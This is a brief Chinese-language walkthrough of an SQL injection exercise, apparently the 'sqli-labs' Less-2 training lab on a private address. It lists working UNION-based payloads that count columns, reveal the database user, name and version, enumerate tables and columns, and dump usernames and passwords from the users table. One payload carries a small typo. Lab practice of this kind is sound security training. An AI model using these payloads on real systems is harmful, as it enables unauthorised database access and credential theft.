打开目标地址：http://192.168.232.99:32013/sqli/less-2/index.php?id=1

然后我们来猜他的表段 url/?id=x order by x

发现他的表段是3 http://192.168.232.99:32013/sqli/less-2/index.php?id=1%20order%20by%203

然后我们查看显错点 and 1=2 union select 1,2,3

继续查看他的数据库名称，用户名，mysql版本信息 and 1=2 union select 1,,concat_ws(char(32,58,32),user(),database(),version()),33

查看security数据库中所有表

http://192.168.232.99:32013/sqli/less-2/index.php?id=1%20and%201=2 union select 1,2,unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema=’security’

来查询user所有的表

group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'

查看所有列的值 %20and%201=2%20union%20select%201,2,group_concat(id,’ ‘,username,’ ‘,password) from security.users